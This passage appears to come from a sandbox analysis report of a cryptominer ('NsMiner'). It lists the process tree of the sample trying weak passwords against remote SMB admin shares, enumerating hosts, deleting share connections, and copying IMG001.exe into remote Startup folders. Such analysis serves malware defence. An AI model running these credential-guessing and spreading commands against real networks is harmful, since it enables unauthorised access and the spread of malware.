        net use \\10.127.255.255\Users "0" /user:"administrator"
        6⤵
        
        PID:7032
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2424
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"administrator"
        6⤵
        
        PID:5152
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"administrator"
        6⤵
        
        PID:6916
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:4288
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"administrator"
        6⤵
        
        PID:5288
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"administrator"
        6⤵
        
        PID:6300
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5268
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "administrator" /user:"administrator"
        6⤵
        
        PID:6976
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "administrator" /user:"administrator"
        6⤵
        
        PID:5908
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:4124
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"administrator"
        6⤵
        
        PID:6580
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"administrator"
        6⤵
        
        PID:4276
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:8016
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"administrator"
        6⤵
        
        PID:7032
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"administrator"
        6⤵
        
        PID:4844
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6804
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"user"
        6⤵
        
        PID:6120
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"user"
        6⤵
        
        PID:4344
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7060
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"user"
        6⤵
        
        PID:1988
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"user"
        6⤵
        
        PID:5012
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:7896
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"user"
        6⤵
        
        PID:4272
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"user"
        6⤵
        
        PID:8000
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5940
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "user" /user:"user"
        6⤵
        
        PID:6224
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "user" /user:"user"
        6⤵
        
        PID:7940
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2560
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"user"
        6⤵
        
        PID:7504
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"user"
        6⤵
        
        PID:6604
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6120
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"user"
        6⤵
        
        PID:5252
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"user"
        6⤵
        
        PID:6352
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3164
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"admin"
        6⤵
        
        PID:6872
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"admin"
        6⤵
        
        PID:4108
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4492
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"admin"
        6⤵
        
        PID:3728
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"admin"
        6⤵
        
        PID:2120
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6268
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"admin"
        6⤵
        
        PID:8092
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"admin"
        6⤵
        
        PID:6456
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3816
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "admin" /user:"admin"
        6⤵
        
        PID:2076
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "admin" /user:"admin"
        6⤵
        
        PID:5028
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3784
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"admin"
        6⤵
        
        PID:6812
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"admin"
        6⤵
        
        PID:6352
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7252
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"admin"
        6⤵
        
        PID:3368
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"admin"
        6⤵
        
        PID:5480
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7340
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6748
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6336
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6300
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6840
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:4056
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5736
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7992
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6436
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7560
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6124
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6120
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:900
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ "1808" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:5172
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users "1808" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3968
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6596
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6920
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\Users """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "
        6⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.0.1
        7⤵
        Discovers systems in the same network
        
        PID:4492
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:7668
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:5528
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:6440
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7140
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:660
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7612
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6728
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4456
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4700
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6952
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7360
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6248
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7012
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2416
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6924
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:7196
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:8112
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:8092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:3624
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6520
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6992
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7844
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "
        6⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"
        7⤵
        
        PID:2724
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7640
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        
        PID:4100
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1072
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:436
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2988
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:1448
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7200
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2540
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1928
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:4904
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2936
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7140
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6764
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6464
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:8132
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5476
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6888
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:3024
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:6968
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4044
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2784
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6952
      - C:\Windows\SysWOW64\cmd.exe
        
